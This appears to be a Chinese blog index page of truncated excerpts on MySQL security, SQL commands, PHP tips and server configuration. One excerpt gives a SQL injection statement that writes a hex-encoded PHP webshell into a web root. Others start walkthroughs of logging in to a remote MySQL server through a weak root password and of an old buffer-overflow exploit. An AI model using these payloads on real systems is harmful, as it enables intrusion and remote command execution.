随着网络的普及,基于网络的应用也越来越多。网络数据库就是其中之一。通过一台或几台服务器可以为很多客户提供服务,这种方式给人们带来了很多方便,但也给不法分子造成了可乘之机。由于数据都是通过网络传输的,这就可以在传输的过程中被截获,或者通过非常手段进入数据库。由于以上原因,数据库安全就显得十分重要。因此,本文就以上问题讨论了MySQL数据库在网络安全方面的一些功能。
帐户安全:
帐户是M...
MySQL数据库中的安全解决方案
MySQL服务器内部安全数据目录访问
作为MySQL管理员的您,在维护MySQL安装的安全性和完整性方面能够做些什么。在本文中,我们将更详细地讨论以下与安全性相关的问题:
为什么说安全性是重要的,应该警惕哪些攻击?
从服务器主机中的用户那里您将面临什么风险(内部安全性),能做什么?
从在网络上连接到服务器的客户机那里您将面临什么风险(外部安全性),能做什么?
MySQL管理员有责任保护数据库内容的安全,使得记录只能由经过严格认证的...
通过Mysql的语句生成后门木马的方法
通过Mysql 的语句生成后门木马的方法!
SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:2 3
再通过 http://www.xxx.com/c...
MySQL3.23.31之前版本的安全漏洞
所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。
下面为最初发表于 MySQL 邮件列表的信件摘要。
漏洞是由Jo?o Gouveia 于1月12日发现的:
步骤:
在第一个终端上启动 mysql:
spike:/var/mysql # /sbin/init.d/mysql start
在另外一个终端上输入:
jroberto@spike:~ > mysql -p -e ...
MySQL数据库下载漏洞攻击技术
作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你我所愿,即使你这么做了也难逃被高手攻击的命运。为此我们有必要去了解一些攻击的手法,来增强自己的安全技能。
1.强制下载后缀名为ASP、ASA的数...
Oracle8的不安全因素及几点说明
Oracle8的不安全因素及几点说明
作为对象关系型数据库的杰出代表,Oracle无疑是最具实力的。无论是在数据库的规模,多媒体数据类型的支持,SQL操作复制的并行性还是在安全服务方面,Oracle均比SYBASE、Informix强许多,加上其最新版本Oracle8.0.4更是增强了这方面的特性,而且还引入了一些新的特性,比如:数据分区(Data Partitioning)、对象关系技术(Object Relational Technology)、唯索引表(Index only...
PHP常用MySql操作
PHP中常用的几个 mysql 语句
显示数据库或表:
show databases;//然后可以use database_name;
show tables;
更改表名:
alter table table_name rename new_t;
添加列 :
alter table table_name add column c_n column attributes;
删除列:
alter table table_name drop column c_n;
创建索引:
alter table c_table add index (c_n1,c_n2);
alter table c_table add unique index_name(c_n);
alter table c_t...
MySQL安全问题的一点心得
前两天在帮朋友整理他的主页空间时候,发现的一点关于MySQL可能大家都会忽略的问题:我们知道,在安装完MySQL后,它会自动创建一个root用户和一个匿名用户,其初始密码都是空,对于前者,很多参考资料上都会提醒大家要注意及时设定一个密码,而忽略了后者,大概是因为后者默认设定为只能在本机使用的缘故吧。
但如果你的MySQL是要提供给Web服务器作数据库服务的,忽略这个匿名用户的代价可能相当惨重,因为...
Mssql和Mysql的安全性分析
数据库是电子商务、金融以及ERP系统的基础,通常都保存着重要的商业伙伴和 客户信息。大多数企业、组织以及政府部门的电子数据都保存在各种数据库中,他们 用这些数据库保存一些个人资料,还掌握着敏感的金融数据。但是数据库通常没有象操作系统和网络这样在安全性上受到重视。数据是企业,组织的命脉所在,因此选择一款安全的数据库是至关重要的。大型网站一般使用oracle或DB2,而中小型网站大多数使用更...
Mysql数据库的安全配置、实用技巧
1、前言
MySQL 是完全网络化的跨平台关系型数据库系统,同时是具有客户机/服务器体系结构的分布式数据库管理系统。它具有功能强、使用简便、管理方便、运行速度快、安全可靠性强等优点,用户可利用许多语言编写访问MySQL 数据库的程序,特别是与PHP更是黄金组合,运用十分广泛。
由于MySQL是多平台的数据库,它的默认配置要考虑各种情况下都能适用,所以在我们自己的使用环境下应该进行进一步的安全加固。...
MYSQL用户root密码为弱口令的攻击
1、连接到对方MYSQL 服务器
mysql -u root -h 192.168.0.1
mysql.exe 这个程序在你安装了MYSQL的的BIN目录中
2、让我们来看看服务器中有些什么数据库
mysql>show databases;
MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。
3、让我们进入数据库
mysql>use test;
我们将会进入test数据库中
4、查看我们进入数据库中有些什么数据表
mysql>...
怎样使MySQL安全以对抗解密高手
当你连接一个MySQL服务器时,你通常应该使用一个口令。口令不以明文在连接上传输。
所有其它信息作为能被任何人读懂的文本被传输。如果你担心这个,你可使用压缩协议(MySQL3.22和以上版本)使事情变得更难。甚至为了使一切更安全,你应该安装ssh。用它,你能在一个MySQL服务器与一个MySQL客户之间得到一个加密的TCP/IP连接。
为了使一个MySQL系统安全,强烈要求你考虑下列建议:
对所有MySQL用户使用口令。...
PHP如何在原时间上加上一天?一个小时?
php如何在原来的时间上加一天?一小时?
<?php
echo "今天:",date('Y-m-d H:i:s'),"<br>";
echo "明天:",date('Y-m-d H:i:s',strtotime('+1 day'));
?>
上一行输出当前时间,下一行输出明天时间
这里+1 day可以修改参数1为任何想需要的数 day也可以改成year(年),month(月),hour(小时)minute(分),s...
MySQL命令行中给表添加一个字段(字段名、是否为空、默认值)
本文介绍MySQL数据库使用SQL语句来在现有的表中,添加一个新的字段,包括设置字段的是否为空、默认值等。
先看一下最简单的例子,在test中,添加一个字段,字段名为birth,类型为date类型。
mysql> alter table test add column birth date;
Query OK, 0 rows affected (0.36 sec)
Records:&...
命令行方式管理MySQL数据库实例
一、从命令行登录MySQL数据库服务器
1、登录使用默认3306端口的MySQL
/usr/local/mysql/bin/mysql -u root -p
2、通过TCP连接管理不同端口的多个MySQL(注意:MySQL4.1以上版本才有此项功能)
/usr/local/mysql/bin/mysql -u root -p --protocol=tcp --host=localhost --port=3307
3、通过socket套接字管理不同端口的多个MySQL
/usr/local/mysql/bin/mysql -u root -p --socket=/tmp/mysql3307.sock
4、通...
一些常用的MySQL命令收集整理
MySQL命令行是学习MySQL数据库必须要掌握的知识,下面就为您介绍了10个好用的MySQL命令行,希望对您学习MySQL命令行方面能有所帮助。
1、显示数据表的结构:
mysql> DESCRIBE 表名; (DESC 表名)
2、建立数据表:
mysql> USE 库名; //进入数据库
mysql> CREATE TABLE 表名 (字段名 VARCHAR(20), 字段名 CHAR(1));
3、删除数据表:
mysql> DROP TABLE 表名;
4、重命名数据表
alter table t1 rename t2;
5、显...
php 截取去掉最后/第一个字符
在PHP的应用中,经常需要对字符进行组合使用,比如我们得到的变量多余出一个逗号或者分号之类的,这个时候想要去掉的话,就需要使用PHP的内置函数来去掉了,又或者说我们得到的变量正好多出一个逗号或者分号,同样需要使用PHP来去掉最后的一个或多个字符。
好了,使用PHP截取或者去掉字符,然后组合成新的变量,这在PHP中是很容易就能实现的,也是我目前使用频率比较大的一个小功能,虽然是小功能又很简单...
php判断一个字符串包含另一个字符串
PHP很简单的一个函数,也是最常用的一个函数了,有两个字符串,需要做个比较判断,一个字符串中是否包含另外一个字符串,实际上就是php内置函数strpos或者strstr,这两个函数都可以实现判断一个字符串是否包含另一个字符串的判断,另外还有比较替换函数等等都可以进行判断的。
因为这个函数使用的频率较高,而我又不愿意去脑记,所以只好写在博客里面了,需要的时候拿出来摘抄。
strpos()
定义和用法:strp...
虚拟主机windows iis7.5的301重定向web.config文件规则
经常玩winserver的人应该知道,在iis+php的环境配置下,如果想要做301重定向的话,也只有使用web.config的配置文件来定义了,其实在web.config下面定义也是很简单的,不过跟 .htaccess 文件的定向相比的话,优点却不是很明显了,在 .htaccess 下面可以单页面定向301转向,而在web.config下面则不行,也不知道是我自己设置url重定向有问题,还是怎么的,总之没有配置成功。
最后的解决方法是先转向到页面的i...
Unable to connect to a repository at URL错误
在centos 6.5服务器端搭建好了svn之后,无论如何在客户端都使用不了,直接报 Unable to connect to a repository at URL错误,后来问了一下经理,原来他在服务器端搭建了一个版本的svn,这就奇怪了,估计是有重突的原因吧。
然后又在本地虚拟机里面搭建 svn,结果同样报出了 Unable to connect to a repository at URL 的错误,这里说明一下,原来在虚拟机里面是有svn的,然后从网上查了一下,说是原来 svn...